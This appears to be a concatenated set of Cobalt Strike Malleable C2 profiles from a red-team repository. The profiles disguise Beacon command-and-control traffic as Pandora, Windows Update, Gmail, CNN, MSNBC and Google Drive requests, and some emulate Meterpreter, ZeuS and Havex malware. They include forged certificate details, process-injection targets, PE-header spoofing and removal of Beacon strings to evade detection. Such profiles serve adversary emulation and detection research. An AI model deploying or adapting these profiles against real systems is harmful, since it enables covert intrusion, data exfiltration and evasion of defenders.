        header "Cache-Control" "public,max-age=172800";
        header "Age" "1222";
        header "Alternate-Protocol" "80:quic";

        output {
            print;
        }
    }
}

http-post {

    set uri "/safebrowsing/rd/CINnu27nLO8hbHdfgmUtc2ihdmFyEAcY4";

    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Accept-Encoding" "gzip, deflate";

        id {
            netbios;
            prepend "U=779b64e1a7ed737a";
            prepend "PREF=ID=";
            header "Cookie";
        }

        output {
            print;
        }
    }

    server {
        header "Content-Type" "application/vnd.google.safebrowsing-chunk";
        header "X-Content-Type-Options" "nosniff";
        header "Content-Encoding" "gzip";
        header "X-XSS-Protection" "1; mode=block";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Cache-Control" "public,max-age=172800";
        header "Age" "1222";
        header "Alternate-Protocol" "80:quic";
        output {
            print;
        }
    }
}

--------------------------------------------------------------------------------
/normal/pandora.profile:
-------------------------------------------------------------------------------- 1 | # 2 | # Standard Pandora traffic profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "1000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 11 | 12 | http-get { 13 | 14 | set uri "/access/"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "GetContentFeatures.DLNA.ORG" "1"; 20 | header "Host" "audio-sv5-t1-3.pandora.com"; 21 | header "Cookie" " __utma=210077622.1732439995.1433201462.1403204372.1385202493.2;"; 22 | 23 | parameter "version" "4"; 24 | parameter "lid" "1582502724"; 25 | 26 | metadata { 27 | netbios; 28 | parameter "token"; 29 | } 30 | } 31 | 32 | server { 33 | 34 | header "Server" "Apache"; 35 | header "Cache-Control" "no-cache, no-store, must-revalidate, max-age=-1"; 36 | header "Pragma" "no-cache, no-store"; 37 | #header "Expires" "-1"; 38 | header "Connection" "close"; 39 | header "Content-Type" "audio/mp4"; 40 | 41 | output { 42 | 43 | # mp4 header 44 | # 0000000: 0000 001c 6674 7970 6d70 3432 0000 0001 ....ftypmp42.... 45 | # 0000010: 4d34 5620 6d70 3432 6973 6f6d 0001 6fd9 M4V mp42isom..o. 
46 | 47 | prepend "\x6d\x6f\x6f\x76\x00\x00\x00\x6c\x6d\x76\x68\x64"; 48 | prepend "\x4d\x34\x56\x20\x6d\x70\x34\x32\x69\x73\x6f\x6d\x00\x01\x6f\xd9"; 49 | prepend "\x00\x00\x00\x1c\x66\x74\x79\x70\x6d\x70\x34\x32\x00\x00\x00\x01"; 50 | 51 | print; 52 | } 53 | } 54 | } 55 | 56 | http-post { 57 | 58 | set uri "/radio/xmlrpc/v35"; 59 | 60 | client { 61 | 62 | header "Accept" "*/*"; 63 | header "Content-Type" "text/xml"; 64 | header "X-Requested-With" "XMLHttpRequest"; 65 | header "Host" "www.pandora.com"; 66 | 67 | id { 68 | parameter "rid"; 69 | } 70 | 71 | parameter "lid" "1582502724"; 72 | parameter "method" "getSearchRecommendations"; 73 | 74 | output { 75 | base64; 76 | print; 77 | } 78 | } 79 | 80 | server { 81 | 82 | header "Content-Type" "text/xml"; 83 | header "Cache-Control" "no-cache, no-store, no-transform, must-revalidate, max-age=0"; 84 | header "Expires" "-1"; 85 | header "Vary" "Accept-Encoding"; 86 | header "Content-Encoding" "gzip"; 87 | 88 | output { 89 | print; 90 | } 91 | } 92 | } 93 | -------------------------------------------------------------------------------- /normal/microsoftupdate_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Microsoft Update 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | #set https cert info 8 | #information assumed based on other Microsoft certs 9 | https-certificate { 10 | set CN "www.windowsupdate.com"; #Common Name 11 | set O "Microsoft Corporation"; #Organization Name 12 | set C "US"; #Country 13 | set L "Redmond"; #Locality 14 | set OU "Microsoft IT"; #Organizational Unit Name 15 | set ST "WA"; #State or Province 16 | set validity "365"; #Number of days the cert is valid for 17 | } 18 | 19 | #default Beacon sleep duration and jitter 20 | set sleeptime "60000"; 21 | set jitter "20"; 22 | 23 | #default useragent for HTTP comms 24 | set useragent "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40"; 25 | 26 | #IP address used to indicate no 
tasks are available to DNS Beacon 27 | set dns_idle "8.8.4.4"; 28 | 29 | #Force a sleep prior to each individual DNS request. (in milliseconds) 30 | set dns_sleep "0"; 31 | 32 | #Maximum length of hostname when uploading data over DNS (0-255) 33 | set maxdns "235"; 34 | 35 | http-get { 36 | 37 | set uri "/c/msdownload/update/others/2016/12/29136388_"; 38 | 39 | client { 40 | 41 | header "Accept" "*/*"; 42 | header "Host" "download.windowsupdate.com"; 43 | 44 | #session metadata 45 | metadata { 46 | base64url; 47 | append ".cab"; 48 | uri-append; 49 | } 50 | } 51 | 52 | 53 | server { 54 | header "Content-Type" "application/vnd.ms-cab-compressed"; 55 | header "Server" "Microsoft-IIS/8.5"; 56 | header "MSRegion" "N. America"; 57 | header "Connection" "keep-alive"; 58 | header "X-Powered-By" "ASP.NET"; 59 | 60 | #Beacon's tasks 61 | output { 62 | 63 | print; 64 | } 65 | } 66 | } 67 | 68 | http-post { 69 | 70 | set uri "/c/msdownload/update/others/2016/12/3215234_"; 71 | set verb "GET"; 72 | 73 | client { 74 | 75 | header "Accept" "*/*"; 76 | 77 | #session ID 78 | id { 79 | prepend "download.windowsupdate.com/c/"; 80 | header "Host"; 81 | } 82 | 83 | 84 | #Beacon's responses 85 | output { 86 | base64url; 87 | append ".cab"; 88 | uri-append; 89 | } 90 | } 91 | 92 | server { 93 | header "Content-Type" "application/vnd.ms-cab-compressed"; 94 | header "Server" "Microsoft-IIS/8.5"; 95 | header "MSRegion" "N. 
America"; 96 | header "Connection" "keep-alive"; 97 | header "X-Powered-By" "ASP.NET"; 98 | 99 | #empty 100 | output { 101 | print; 102 | } 103 | } 104 | } 105 | 106 | #change the stager server 107 | http-stager { 108 | server { 109 | header "Content-Type" "application/vnd.ms-cab-compressed"; 110 | } 111 | } 112 | -------------------------------------------------------------------------------- /normal/gmail.profile: -------------------------------------------------------------------------------- 1 | # Make requests look like GMail web requests 2 | # 3 | # Author: @ChrisTruncer 4 | 5 | https-certificate { 6 | set CN "gmail.com"; 7 | set O "Google GMail"; 8 | set C "US"; 9 | set L "Mountain View"; 10 | set OU "Google Mail"; 11 | set ST "CA"; 12 | set validity "365"; 13 | } 14 | 15 | set sleeptime "60000"; 16 | set pipename "interprocess_##"; 17 | set spawnto "userinit.exe"; 18 | set jitter "15"; 19 | set dns_idle "8.8.4.4"; 20 | 21 | http-get { 22 | set uri "/_/scs/mail-static/_/js/"; 23 | client { 24 | 25 | metadata { 26 | base64; 27 | prepend "OSID="; 28 | header "Cookie"; 29 | } 30 | 31 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 32 | header "Accept-Language" "en-US,en;q=0.5"; 33 | header "Accept-Encoding" "gzip, deflate"; 34 | header "DNT" "1"; 35 | } 36 | 37 | server { 38 | header "X-Content-Type-Options" "nosniff"; 39 | header "X-Frame-Options" "SAMEORIGIN"; 40 | header "Cache-Control" "public, max-age=31536000"; 41 | header "X-XSS-Protection" "1; mode=block"; 42 | header "Server" "GSE"; 43 | header "Alternate-Protocol" "443:quic,p=1"; 44 | 45 | output{ 46 | prepend "try("; 47 | prepend "O(L.Oa(),\"sy580\")"; 48 | prepend "N(L.Oa(),\"sy580\");P(L.Oa(),\"sy580\");"; 49 | prepend ")catch(e)(_DumpException(e))"; 50 | prepend "try("; 51 | prepend "O(L.Oa(),\"sy558\");"; 52 | prepend "N(L.Oa(),\"sy558\");P(L.Oa(),\"sy558\");"; 53 | prepend ")catch(e)(_DumpException(e))"; 54 | prepend "try("; 55 | 56 | append "var 
f2=function(a)(a=a.wa;return\"application/chromium-bookmark-folder\"==a||\"application/chromium-root-folder\"==a||\"application/vnd.google-apps.folder\"==a||\"application/vnd.google-apps.photoalbum\"==a||\"application/vnd.google-apps.rollupphotoalbum\"==a)"; 57 | append ",g2=function(a)(return a.ra),s8d=function(a)(return a?hb(a,function(a)(return new UP(a)):[]),h2=function(a)(switch(a)(case \"all\":case \"docs-images\":case \"docs-images-and-videos\":case \"docs-videos\":case \"documents\":case \"drawings\":case \"folders\":case \"forms\":case \"pdfs\":case \"presentations\":case \"sites\":case \"spreadsheets\":case \"tables\":return!0)return!1); O(L.Oa(),\"sy588\")"; 58 | 59 | print; 60 | 61 | } 62 | } 63 | } 64 | 65 | http-post { 66 | set uri "/mail/u/0/"; 67 | client { 68 | parameter "ui" "d3244c4707"; 69 | parameter "hop" "6928632"; 70 | parameter "start" "0"; 71 | header "Content-Type" "application/x-www-form-urlencoded;charset=utf-8"; 72 | 73 | id { 74 | base64; 75 | prepend "OSID="; 76 | header "Cookie"; 77 | } 78 | 79 | output{ 80 | base64; 81 | print; 82 | } 83 | } 84 | 85 | server { 86 | header "X-Content-Type-Options" "nosniff"; 87 | header "X-Frame-Options" "SAMEORIGIN"; 88 | header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate"; 89 | header "X-XSS-Protection" "1; mode=block"; 90 | header "Server" "GSE"; 91 | 92 | output { 93 | 94 | prepend "[[[\"apm\",\""; 95 | 96 | append "\"]"; 97 | append ",[\"ci\",[]"; 98 | append "]"; 99 | append ",[\"cm\",[]"; 100 | append ",[]"; 101 | append "]"; 102 | append "],'dbb8796a80d45e1f']"; 103 | 104 | print; 105 | } 106 | 107 | } 108 | } 109 | -------------------------------------------------------------------------------- /normal/cnnvideo_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # CNN Video 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | #set https cert info 8 | # CNN doesnt have real cert, guessed details 9 | https-certificate { 
10 | set CN "www.cnn.com"; #Common Name 11 | set O "Turner Broadcasting System Inc"; #Organization Name 12 | set C "US"; #Country 13 | set L "Atlanta"; #Locality 14 | set OU "MSS (Media Software & Services)"; #Organizational Unit Name 15 | set ST "GA"; #State or Province 16 | set validity "365"; #Number of days the cert is valid for 17 | } 18 | 19 | #default Beacon sleep duration and jitter 20 | set sleeptime "60000"; 21 | set jitter "20"; 22 | 23 | #default useragent for HTTP comms 24 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 25 | 26 | #IP address used to indicate no tasks are available to DNS Beacon 27 | set dns_idle "8.8.4.4"; 28 | 29 | #Force a sleep prior to each individual DNS request. (in milliseconds) 30 | set dns_sleep "0"; 31 | 32 | #Maximum length of hostname when uploading data over DNS (0-255) 33 | set maxdns "235"; 34 | 35 | http-get { 36 | 37 | set uri "/cnn/cnnx/dai/hds/stream_hd/1/cnnxlive1_4.bootstrap"; 38 | 39 | client { 40 | 41 | header "Host" "phds-live.cdn.turner.com"; 42 | header "X-Requested-With" "ShockwaveFlash/24.0.0.186"; 43 | header "Referer" "http://go.cnn.com/?stream=cnn&sr=watchHPbutton"; 44 | 45 | #session metadata 46 | metadata { 47 | base64url; 48 | parameter "g"; 49 | } 50 | 51 | parameter "hdcore" "3.4.1"; 52 | parameter "plugin" "aasp-3.4.1.1.1"; 53 | } 54 | 55 | 56 | server { 57 | 58 | 59 | header "Server" "ngx_openresty"; 60 | header "Content-Type" "application/octet-stream"; 61 | header "ETag" "dbbece0334279b5bfbf88c27bda56444"; 62 | header "Cache-Control" "max-age=1"; 63 | header "Connection" "keep-alive"; 64 | 65 | #Beacon's tasks 66 | output { 67 | 68 | print; 69 | } 70 | } 71 | } 72 | 73 | http-post { 74 | 75 | set uri "/cnn/cnnx/dai/hds/stream_hd/2/cnnxlive1_4.bootstrap"; 76 | set verb "GET"; 77 | 78 | client { 79 | 80 | header "Host" "phds-live.cdn.turner.com"; 81 | header "X-Requested-With" "ShockwaveFlash/24.0.0.186"; 82 | 83 | 84 | #session ID 85 | id { 86 | base64url; 
87 | prepend "http://go.cnn.com/?stream=cnn&sr=watchHPbutton&token="; 88 | header "Referer"; 89 | } 90 | 91 | #Beacon's responses 92 | output { 93 | base64url; 94 | parameter "g"; 95 | } 96 | 97 | parameter "hdcore" "3.4.1"; 98 | parameter "plugin" "aasp-3.4.1.1.1"; 99 | } 100 | 101 | server { 102 | 103 | header "Server" "ngx_openresty"; 104 | header "Content-Type" "application/octet-stream"; 105 | header "ETag" "dbbece0334279b5bfbf88c27bda56444"; 106 | header "Cache-Control" "max-age=1"; 107 | header "Connection" "keep-alive"; 108 | 109 | #empty 110 | output { 111 | print; 112 | } 113 | } 114 | } 115 | 116 | #change the stager server 117 | http-stager { 118 | server { 119 | header "Content-Type" "application/octet-stream"; 120 | } 121 | } 122 | -------------------------------------------------------------------------------- /APT/meterpreter.profile: -------------------------------------------------------------------------------- 1 | # Meterpreter profile 2 | # 3 | # This was a fun exercise, make Beacon Meterpreter-like. :) 4 | # 5 | # https://www.metasploit.com/ 6 | # 7 | set sample_name "Meterpreter"; 8 | 9 | # 100ms sleep time. 10 | set sleeptime "100"; 11 | 12 | # what else would we spawn to? 
13 | set spawnto_x86 "%windir%\\syswow64\\notepad.exe"; 14 | set spawnto_x64 "%windir%\\sysnative\\notepad.exe"; 15 | 16 | # process injection tweak 17 | set hijack_remote_thread "false"; 18 | 19 | # propagate user-agent to all transactions 20 | set useragent "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"; 21 | 22 | # set some PE and memory indicators to resemble the metasploit rDLL 23 | stage { 24 | # PE header fields 25 | set checksum "0"; 26 | set compile_time "08 May 2017 23:13:38"; 27 | set entry_point "558586"; 28 | set image_size_x86 "987136"; 29 | set image_size_x64 "1232896"; 30 | set name "metsrv.dll"; 31 | set rich_header "\xf4\x1f\x93\x1a\xb0\x7e\xfd\x49\xb0\x7e\xfd\x49\xb0\x7e\xfd\x49\xf6\x2f\x1c\x49\x9d\x7e\xfd\x49\xf6\x2f\x22\x49\xaf\x7e\xfd\x49\xf6\x2f\x1d\x49\x0b\x7e\xfd\x49\xcd\x07\x1d\x49\x3f\x7f\xfd\x49\xb0\x7e\xfc\x49\x63\x7e\xfd\x49\xb9\x06\x6e\x49\xa1\x7e\xfd\x49\xb9\x06\x7e\x49\xb1\x7e\xfd\x49\xbd\x2c\x22\x49\xb1\x7e\xfd\x49\xbd\x2c\x1d\x49\xaa\x7e\xfd\x49\xbd\x2c\x21\x49\xb1\x7e\xfd\x49\xbd\x2c\x23\x49\xb1\x7e\xfd\x49\x52\x69\x63\x68\xb0\x7e\xfd\x49\x00\x00\x00\x00\x00\x00\x00\x00"; 32 | 33 | # obfuscations 34 | set userwx "true"; 35 | set stomppe "false"; 36 | 37 | # strings 38 | stringw "%04x-%04x:%s"; 39 | stringw "pipe"; 40 | stringw "SeSecurityPrivilege"; 41 | stringw "pipe"; 42 | stringw "\\\\%s\\pipe\\%s"; 43 | stringw "https"; 44 | stringw "POST"; 45 | stringw "POST"; 46 | string "stdapi_sys_process_getpid"; 47 | string "[%x]"; 48 | string "buffer_from_file"; 49 | string "buffer_to_file"; 50 | string "channel_close"; 51 | string "channel_create"; 52 | 53 | # get rid of some stuff 54 | transform-x86 { 55 | strrep "beacon.dll" ""; 56 | } 57 | 58 | transform-x64 { 59 | strrep "beacon.x64.dll" ""; 60 | } 61 | } 62 | 63 | # SSL cert 64 | https-certificate { 65 | set O "dmcjna"; 66 | set CN "dmcjna"; 67 | set validity "3285"; 68 | } 69 | 70 | # staging process 71 | http-stager { 72 | server { 73 | header "Content-Type" 
"application/octet-stream"; 74 | header "Connection" "Keep-Alive"; 75 | header "Server" "Apache"; 76 | } 77 | } 78 | 79 | # HTTP GET 80 | http-get { 81 | set uri "/ucD"; 82 | 83 | client { 84 | header "Cache-Control" "no-cache"; 85 | header "Connection" "Keep-Alive"; 86 | header "Pragma" "no-cache"; 87 | 88 | metadata { 89 | base64url; 90 | uri-append; 91 | } 92 | } 93 | 94 | server { 95 | header "Content-Type" "application/octet-stream"; 96 | header "Connection" "Keep-Alive"; 97 | header "Server" "Apache"; 98 | 99 | output { 100 | print; 101 | } 102 | } 103 | } 104 | 105 | # HTTP POST 106 | http-post { 107 | set uri "/ucW"; 108 | 109 | client { 110 | header "Cache-Control" "no-cache"; 111 | header "Connection" "Keep-Alive"; 112 | header "Pragma" "no-cache"; 113 | 114 | id { 115 | base64url; 116 | append "UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ"; 117 | uri-append; 118 | } 119 | 120 | output { 121 | print; 122 | } 123 | } 124 | 125 | # The server's response to our HTTP POST 126 | server { 127 | header "Content-Type" "application/octet-stream"; 128 | header "Connection" "Keep-Alive"; 129 | header "Server" "Apache"; 130 | 131 | # this will just print an empty string, meh... 
132 | output { 133 | print; 134 | } 135 | } 136 | } 137 | -------------------------------------------------------------------------------- /normal/msnbcvideo_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # MSNBC Live Video 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | #set https cert info 8 | 9 | #NOTE: As of writing, MSNBC doesn't support HTTPS - these are made-up cert details based on nbc.com cert 10 | https-certificate { 11 | set CN "www.msnbc.com"; #Common Name 12 | set O "General Electric Company"; #Organization Name 13 | set C "US"; #Country 14 | set L "Fairfield"; #Locality 15 | set OU "Enterprise SSL Wildcard"; #Organizational Unit Name 16 | set ST "CT"; #State or Province 17 | set validity "365"; #Number of days the cert is valid for 18 | } 19 | 20 | #default Beacon sleep duration and jitter 21 | set sleeptime "1000"; 22 | set jitter "20"; 23 | 24 | #default useragent for HTTP comms 25 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 26 | 27 | #IP address used to indicate no tasks are available to DNS Beacon 28 | set dns_idle "8.8.4.4"; 29 | 30 | #Force a sleep prior to each individual DNS request. 
(in milliseconds) 31 | set dns_sleep "0"; 32 | 33 | #Maximum length of hostname when uploading data over DNS (0-255) 34 | set maxdns "235"; 35 | 36 | http-get { 37 | 38 | set uri "/z/msnbc2_live01@9615/manifest.f4m"; 39 | 40 | client { 41 | 42 | header "Host" "msnbc2prod-lh.akamaihd.net"; 43 | header "X-Requested-With" "ShockwaveFlash/24.0.0.186"; 44 | header "Referer" "http://player.theplatform.com/p/7wvmTC/NBCOnAirProdPlayer/embed/select?s=msnbc"; 45 | 46 | parameter "hdcore" "3.1"; 47 | 48 | #session metadata 49 | metadata { 50 | netbios; 51 | parameter "g"; 52 | } 53 | } 54 | 55 | 56 | server { 57 | 58 | header "Server" "AkamaiGHost"; 59 | header "Mime-Version" "1.0"; 60 | header "Content-Type" "video/abst"; 61 | header "Cache-Control" "max-age=0, no-cache"; 62 | header "Pragma" "no-cache"; 63 | header "Connection" "keep-alive"; 64 | header "Set-Cookie" "_alid_=RKs7UfhDqLr37whMpHIwBg==; path=/z/msnbc2_live01@9615/; domain=msnbc2prod-lh.akamaihd.net"; 65 | 66 | #Beacon's tasks 67 | output { 68 | 69 | print; 70 | } 71 | } 72 | } 73 | 74 | http-post { 75 | 76 | set uri "/z/msnbc2_live01@6915/manifest.f4m"; 77 | set verb "GET"; 78 | 79 | client { 80 | 81 | header "Host" "msnbc2prod-lh.akamaihd.net"; 82 | header "X-Requested-With" "ShockwaveFlash/24.0.0.186"; 83 | 84 | parameter "hdcore" "3.1"; 85 | 86 | #session ID 87 | id { 88 | netbios; 89 | base64url; 90 | parameter "g"; 91 | } 92 | 93 | #Beacon's responses 94 | output { 95 | base64url; 96 | prepend "http://player.theplatform.com/p/"; 97 | append "/NBCOnAirProdPlayer/embed/select?s=msnbc"; 98 | header "Referer"; 99 | } 100 | } 101 | 102 | server { 103 | 104 | header "Server" "AkamaiGHost"; 105 | header "Mime-Version" "1.0"; 106 | header "Content-Type" "video/abst"; 107 | header "Cache-Control" "max-age=0, no-cache"; 108 | header "Pragma" "no-cache"; 109 | header "Connection" "keep-alive"; 110 | header "Set-Cookie" "_alid_=RKs7UfhDqLr37whMpHIwBg==; path=/z/msnbc2_live01@6915/; domain=msnbc2prod-lh.akamaihd.net"; 
111 | 112 | #empty 113 | output { 114 | print; 115 | } 116 | } 117 | } 118 | 119 | #change the stager server 120 | http-stager { 121 | server { 122 | header "Content-Type" "image/gif"; 123 | } 124 | } 125 | -------------------------------------------------------------------------------- /normal/googledrive_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Google Drive 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | #set https cert info 8 | https-certificate { 9 | set CN "*.google.com"; #Common Name 10 | set O "Google Inc"; #Organization Name 11 | set C "US"; #Country 12 | set L "Mountain View"; #Locality 13 | set ST "California"; #State or Province 14 | set validity "365"; #Number of days the cert is valid for 15 | } 16 | 17 | #default Beacon sleep duration and jitter 18 | set sleeptime "60000"; 19 | set jitter "20"; 20 | 21 | #default useragent for HTTP comms 22 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 23 | 24 | #IP address used to indicate no tasks are available to DNS Beacon 25 | set dns_idle "8.8.4.4"; 26 | 27 | #Force a sleep prior to each individual DNS request. 
(in milliseconds) 28 | set dns_sleep "0"; 29 | 30 | #Maximum length of hostname when uploading data over DNS (0-255) 31 | set maxdns "235"; 32 | 33 | http-get { 34 | 35 | set uri "/viewerng/meta"; 36 | 37 | client { 38 | 39 | header "Accept" "text/html,application/xml;*/*;"; 40 | header "Accept-Encoding" "gzip, deflate"; 41 | header "Host" "drive.google.com"; 42 | header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;"; 43 | 44 | #session metadata 45 | metadata { 46 | base64url; 47 | netbios; 48 | base64url; 49 | parameter "id"; 50 | } 51 | 52 | parameter "u" "0"; 53 | } 54 | 55 | server { 56 | header "Content-Type" "application/json; charset=utf-8"; 57 | header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate"; 58 | header "Pragma" "no-cache"; 59 | header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt"; 60 | header "X-Content-Type-Options" "nosniff"; 61 | header "X-Frame-Options" "SAMEORIGIN"; 62 | header "X-XSS-Protection" "1; mode=block"; 63 | header "Server" "GSE"; 64 | header "Connection" "close"; 65 | 66 | 67 | #Beacon's tasks 68 | output { 69 | print; 70 | } 71 | } 72 | } 73 | 74 | http-post { 75 | 76 | set uri "/viewersng/meta"; 77 | set verb "GET"; 78 | 79 | client { 80 | 81 | header "Accept" "text/html,application/xml;*/*;"; 82 | header "Accept-Encoding" "gzip, deflate"; 83 | header "Host" "drive.google.com"; 84 | header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;"; 85 | 86 | 87 | output { 88 | base64url; 89 | netbios; 90 | base64url; 91 | parameter "id"; 92 | } 93 | 94 | #session ID 95 | id { 96 | parameter "u"; 97 | } 98 | } 99 | 100 | server { 101 | header "Content-Type" "application/json; charset=utf-8"; 102 | header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate"; 103 | header "Pragma" "no-cache"; 104 | header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt"; 105 | header 
"X-Content-Type-Options" "nosniff"; 106 | header "X-Frame-Options" "SAMEORIGIN"; 107 | header "X-XSS-Protection" "1; mode=block"; 108 | header "Server" "GSE"; 109 | header "Connection" "close"; 110 | 111 | 112 | output { 113 | print; 114 | } 115 | } 116 | } 117 | 118 | #change the stager server 119 | http-stager { 120 | server { 121 | header "Content-Type" "application/json; charset=utf-8"; 122 | header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate"; 123 | header "Pragma" "no-cache"; 124 | } 125 | } 126 | -------------------------------------------------------------------------------- /crimeware/zeus.profile: -------------------------------------------------------------------------------- 1 | # 2 | # ZeuS Sample Profile 3 | # client - https://malwr.com/analysis/NjIwNTU2ODA2OTUxNDcwNmJiMTMzYzk4YzU4NWQyZDQ/ 4 | # server - http://malware-traffic-analysis.net/2014/04/05/index.html 5 | # 6 | # Author: @harmj0y 7 | # 8 | set sample_name "ZeuS"; 9 | 10 | set sleeptime "30000"; 11 | set jitter "5"; 12 | set maxdns "255"; 13 | set useragent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"; 14 | 15 | # Sample from: https://malshare.com/sample.php?action=detail&hash=1da10c6412b79fe8ffcbb5d1901144ee 16 | stage { 17 | # ./peclone 1da10c6412b79fe8ffcbb5d1901144ee 18 | set checksum "0"; 19 | set compile_time "24 Mar 2011 07:36:23"; 20 | set entry_point "93589"; 21 | set rich_header "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 22 | set stomppe "false"; 23 | 24 | # strings -e l 1da10c6412b79fe8ffcbb5d1901144ee 25 | stringw "nspr4.dll"; 26 | stringw ".tmp"; 27 | stringw "DISPLAY"; 28 | stringw "SeShutdownPrivilege"; 29 | stringw 
"cGlobal\\%08X%08X%08X"; 30 | stringw "TSeTcbPrivilege"; 31 | stringw ".exe"; 32 | stringw "SOFTWARE\\Microsoft"; 33 | stringw "SysListView32"; 34 | stringw "MDIClient"; 35 | stringw "CiceroUIWndFrame"; 36 | stringw "ConsoleWindowClass"; 37 | stringw "#32768"; 38 | stringw "SysShadow"; 39 | stringw "e.dat"; 40 | stringw "kernel32.dll"; 41 | stringw "\"%s\""; 42 | stringw "\"%s\" %s"; 43 | stringw "/c \"%s\""; 44 | stringw "ComSpec"; 45 | stringw "S:(ML;;NRNWNX;;;LW)"; 46 | stringw "SeSecurityPrivilege"; 47 | stringw "S:(ML;CIOI;NRNWNX;;;LW)"; 48 | stringw "Global\\"; 49 | stringw "Local\\"; 50 | stringw "%s%08x.%s"; 51 | stringw "%s%08x"; 52 | 53 | # strings 1da10c6412b79fe8ffcbb5d1901144ee 54 | string "del \"%s\""; 55 | string "if exist \"%s\" goto d"; 56 | string "@echo off"; 57 | string "del /F \"%s\""; 58 | 59 | # get rid of some standard Cobalt Strike stuff. 60 | transform-x86 { 61 | strrep "beacon.dll" ""; 62 | strrep "ReflectiveLoader" ""; 63 | } 64 | 65 | transform-x64 { 66 | strrep "beacon.x64.dll" ""; 67 | strrep "ReflectiveLoader" ""; 68 | } 69 | } 70 | 71 | http-get { 72 | 73 | set uri "/metro91/admin/1/ppptp.jpg"; 74 | 75 | client { 76 | 77 | header "Accept" "*/*"; 78 | header "Connection" "Close"; 79 | 80 | # throw in a known/old Zeus C2 domain 81 | header "Host" "mahamaya1ifesciences.com"; 82 | header "Cache-Control" "no-cache"; 83 | 84 | metadata { 85 | base64; 86 | header "Cookie"; 87 | } 88 | } 89 | 90 | server { 91 | header "Server" "nginx/1.0.4"; 92 | header "Content-Type" "text/html"; 93 | header "Connection" "close"; 94 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 95 | 96 | output { 97 | print; 98 | } 99 | } 100 | } 101 | 102 | http-post { 103 | 104 | set uri "/metro91/admin/1/secure.php"; 105 | 106 | client { 107 | 108 | header "Accept" "*/*"; 109 | header "Connection" "Keep-Alive"; 110 | 111 | # throw in a known/old Zeus C2 domain 112 | header "Host" "mahamaya1ifesciences.com"; 113 | header "Cache-Control" "no-cache"; 114 | 115 | id { 116 
| netbios; 117 | parameter "id"; 118 | } 119 | 120 | output { 121 | print; 122 | } 123 | } 124 | 125 | server { 126 | header "Server" "nginx/1.0.4"; 127 | header "Content-Type" "text/html"; 128 | header "Connection" "close"; 129 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 130 | 131 | output { 132 | print; 133 | } 134 | } 135 | } 136 | 137 | -------------------------------------------------------------------------------- /APT/havex.profile: -------------------------------------------------------------------------------- 1 | # havex trojan C&C profile 2 | # Actor: Energetic Bear / Crouching Yeti / Dragonfly 3 | # 4 | # See: 5 | # . http://www.symantec.com/connect/blogs/emerging-threat-dragonfly-energetic-bear-apt-group 6 | # . https://securelist.com/files/2014/07/EB-YetiJuly2014-Public.pdf 7 | # . http://pastebin.com/qCdMwtZ6 8 | # . http://www.crowdstrike.com/sites/all/themes/crowdstrike2/css/imgs/platform/CrowdStrike_Global_Threat_Report_2013.pdf 9 | # . https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Havex.yar 10 | # . http://web.archive.org/web/20170808180137/www.f-secure.com/weblog/archives/00002718.html 11 | # . 
# https://www.virustotal.com/#/file/3d3daee1a38e67707921b222f1685d5bd6328af2fc80d4c11d92dc6a6c289261/details
#
# Author: @armitagehacker

set sample_name "HaveX Trojan";

# callback interval; NOTE(review): presumably milliseconds, as in the other profiles in this set - confirm
set sleeptime "30000";

# fixed User-Agent literal, sent unchanged on every request this profile generates
set useragent "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08";

# named-pipe names; NOTE(review): the trailing "##" looks like a runtime placeholder - confirm against the profile reference
set pipename "mypipe-f##";
set pipename_stager "mypipe-h##";

